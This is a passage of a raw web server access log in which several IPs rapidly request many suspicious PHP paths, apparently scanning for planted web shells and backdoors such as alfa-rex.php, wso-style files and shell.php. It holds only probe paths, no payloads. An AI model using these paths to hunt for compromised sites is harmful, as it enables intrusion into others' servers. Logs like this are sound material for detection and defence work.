"GET /engine.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.160.252 - - [15/Sep/2024:22:17:03 +0700] "GET /includes/xmrlpc.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0" 146.70.160.252 - - [15/Sep/2024:22:17:03 +0700] "GET /css/colors/blue/xmrlpc.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 146.70.160.252 - - [15/Sep/2024:22:17:03 +0700] "GET /selectrss/lock.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:17:03 +0700] "GET /plugins/column/miin.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:17:04 +0700] "GET /SimplePie/Content/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:17:04 +0700] "GET /uploads/chosen.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:17:04 +0700] "GET /multi.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:17:04 +0700] "GET /images/wp-load.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:17:04 +0700] "GET /pki-validation/cgozlaue.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:17:05 +0700] "GET /wsoyanzf.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.160.252 - - [15/Sep/2024:22:17:05 +0700] "GET /js/tinymce/utils/wp-function.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:17:05 +0700] "GET /css/colors/light/admin.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:17:05 +0700] "GET /includes/class-foo.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:17:06 +0700] "GET /plugins/wp-theme-editor/fai.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0" 146.70.160.252 - - [15/Sep/2024:22:17:06 +0700] "GET /goods.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:17:06 +0700] "GET /plugins/fix/byp.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:17:06 +0700] "GET /rd.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:17:06 +0700] "GET /js/500.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 146.70.160.252 - - [15/Sep/2024:22:17:07 +0700] "GET /js/wp-scr1pts.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 146.70.160.252 - - [15/Sep/2024:22:17:07 +0700] "GET /php-compat/cloud.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.160.252 - - [15/Sep/2024:22:17:07 +0700] "GET /uploads/2017/class.api.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.160.252 - - [15/Sep/2024:22:17:07 +0700] "GET /IXR/minix.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:17:07 +0700] "GET /pki-validation/about18.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.160.252 - - [15/Sep/2024:22:17:08 +0700] "GET /customize/class_api.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:17:08 +0700] "GET /uploads/2015/03/xguide.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0" 146.70.160.252 - - [15/Sep/2024:22:17:08 +0700] "GET /block-patterns/admin.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:17:08 +0700] "GET /bypass.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:17:08 +0700] "GET /user/moon.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:17:09 +0700] "GET /beez3/moon.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 146.70.160.252 - - [15/Sep/2024:22:17:09 +0700] "GET /themes/include.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0" 146.70.160.252 - - [15/Sep/2024:22:17:09 +0700] "GET /includes/class-wp-filesystem-base.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:17:09 +0700] "GET /updraft/about.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:17:10 +0700] "GET /css/colors/blue/blue.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:17:10 +0700] "GET /plugins/bdxroot/rk3.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:17:10 +0700] "GET /css/dist/alfa-rex.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:17:10 +0700] "GET /locale-meta.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 139.59.166.15 - - [16/Sep/2024:06:24:59 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" 198.235.24.145 - - [16/Sep/2024:09:42:38 +0700] "GET / HTTP/1.1" 301 162 "-" "-" 156.146.33.76 - - [16/Sep/2024:10:12:36 +0700] "GET /images/neko.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:12:36 +0700] "GET /wp-admin/includes/class-custom-header.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" 156.146.33.76 - - [16/Sep/2024:10:12:36 +0700] "GET /wp-includes/wp-includes_function.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0" 156.146.33.76 - - [16/Sep/2024:10:12:37 +0700] "GET /wp-includes/option-module.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 156.146.33.76 - - [16/Sep/2024:10:12:37 +0700] "GET /wp-content/plugins/wp-theme-editor/include.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:12:37 +0700] "GET /wp-content/plugins/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 156.146.33.76 - - [16/Sep/2024:10:12:37 +0700] "GET /customize/atomlib.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0" 156.146.33.76 - - [16/Sep/2024:10:12:38 +0700] "GET /js/tinymce/plugins/compat3x/css/wp-casper.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 156.146.33.76 - - [16/Sep/2024:10:12:38 +0700] "GET /maint/shell.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:12:38 +0700] "GET /class-wp-recovery-mode-email-service-meta.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:12:38 +0700] "GET /js/tinymce/skins/lightgray/img/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 156.146.33.76 - - [16/Sep/2024:10:12:39 +0700] "GET /js/plupload/moderation.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:12:39 +0700] "GET /index2313.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:12:39 +0700] "GET /plugins/ern/gawean.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:12:39 +0700] "GET /maint/aj.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:12:40 +0700] "GET /themes/pridmag/1.php?u HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:12:40 +0700] "GET /settings.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0" 156.146.33.76 - - [16/Sep/2024:10:12:40 +0700] "GET /authorize.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:12:40 +0700] "GET /user/about.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0" 156.146.33.76 - - [16/Sep/2024:10:12:40 +0700] "GET /l/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 156.146.33.76 - - [16/Sep/2024:10:12:41 +0700] "GET /css/colors/blue/aclass.api.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:12:41 +0700] "GET /offercodes.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:12:41 +0700] "GET /themes/finley/min.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0" 156.146.33.76 - - [16/Sep/2024:10:12:41 +0700] "GET /uploads/autoload_classmap.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0" 156.146.33.76 - - [16/Sep/2024:10:12:42 +0700] "GET /css/colors/xmrlpc.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 156.146.33.76 - - [16/Sep/2024:10:12:42 +0700] "GET /digital-download/new.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:12:42 +0700] "GET /ID3/getid.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 156.146.33.76 - - [16/Sep/2024:10:12:42 +0700] "GET /includes/class_api.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0" 156.146.33.76 - - [16/Sep/2024:10:12:43 +0700] "GET /phpunit/phpunit/src/Util/PHP/MARIJUANA.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:12:43 +0700] "GET /plugins/upspy/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:12:43 +0700] "GET /uploads/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:12:43 +0700] "GET /plugins/apikey/wp-config-samples.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:12:44 +0700] "GET /themes/twentynineteen/inc/ty.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:12:44 +0700] "GET /js/tinymce/themes/wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:12:44 +0700] "GET /includes/continents-cities-decryption.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" 156.146.33.76 - - [16/Sep/2024:10:12:44 +0700] "GET /plugins/x/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" 156.146.33.76 - - [16/Sep/2024:10:12:44 +0700] "GET /images/bless.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0" 156.146.33.76 - - [16/Sep/2024:10:12:45 +0700] "GET /customize/admin.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 156.146.33.76 - - [16/Sep/2024:10:12:45 +0700] "GET /plugins/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0" 156.146.33.76 - - [16/Sep/2024:10:12:45 +0700] "GET /codeboy1877_up.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 156.146.33.76 - - [16/Sep/2024:10:12:45 +0700] "GET /plugins/seox/wsoyanzf.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:12:46 +0700] "GET /class-wp-widget-private.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:12:46 +0700] "GET /source.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:12:46 +0700] "GET /ID3/lmfi.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; rv:11.0) like Gecko" 156.146.33.76 - - [16/Sep/2024:10:12:46 +0700] "GET /acme-challenge/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0" 156.146.33.76 - - [16/Sep/2024:10:12:47 +0700] "GET /css/colors/blue/cloud.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0" 156.146.33.76 - - [16/Sep/2024:10:12:47 +0700] "GET /pomo/v2.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:12:47 +0700] "GET /SimplePie/themes.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:12:47 +0700] "GET /allez.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0" 156.146.33.76 - - [16/Sep/2024:10:12:48 +0700] "GET /images/searchl.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 156.146.33.76 - - [16/Sep/2024:10:12:48 +0700] "GET /languages/404.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:12:48 +0700] "GET /com_jea/views/form/tmpl/admin.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 156.146.33.76 - - [16/Sep/2024:10:12:48 +0700] "GET /controller/extension/extension/Not_Found.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0" 156.146.33.76 - - [16/Sep/2024:10:12:48 +0700] "GET /plugins/envato-market/inc/about.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:12:49 +0700] "GET /includes/404.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 156.146.33.76 - - [16/Sep/2024:10:12:49 +0700] "GET /pki-validation/user.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:12:49 +0700] "GET /css/colors/modern/about.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:12:49 +0700] "GET /phpmailer/updates.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:12:50 +0700] "GET /fonts/plugins.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:12:50 +0700] "GET /uploads/hrtp.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 156.146.33.76 - - [16/Sep/2024:10:12:50 +0700] "GET /lufix.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 156.146.33.76 - - [16/Sep/2024:10:12:50 +0700] "GET /includes/alfa-rex.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 156.146.33.76 - - [16/Sep/2024:10:12:51 +0700] "GET /css/colors/coffee/wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 156.146.33.76 - - [16/Sep/2024:10:12:51 +0700] "GET /class-IXR-decryption.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0" 156.146.33.76 - - [16/Sep/2024:10:12:51 +0700] "GET /SimplePie/file.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:12:51 +0700] "GET /pki-validation/xl2023.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:12:52 +0700] "GET /phpunit/phpunit/src/Util/PHP/moon.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:12:52 +0700] "GET /plugins/gucdbuwrso/wp-editor.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 156.146.33.76 - - [16/Sep/2024:10:12:52 +0700] "GET /wp-mail.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:12:52 +0700] "GET /plugin.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:12:52 +0700] "GET /SimplePie/plugins.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0" 156.146.33.76 - - [16/Sep/2024:10:12:53 +0700] "GET /css/colors/blue/bless.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:12:53 +0700] "GET /uploads/eorr.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 156.146.33.76 - - [16/Sep/2024:10:12:53 +0700] "GET /maint/update.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 156.146.33.76 - - [16/Sep/2024:10:12:53 +0700] "GET /plugins/seoo/alfa-rex.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:12:54 +0700] "GET 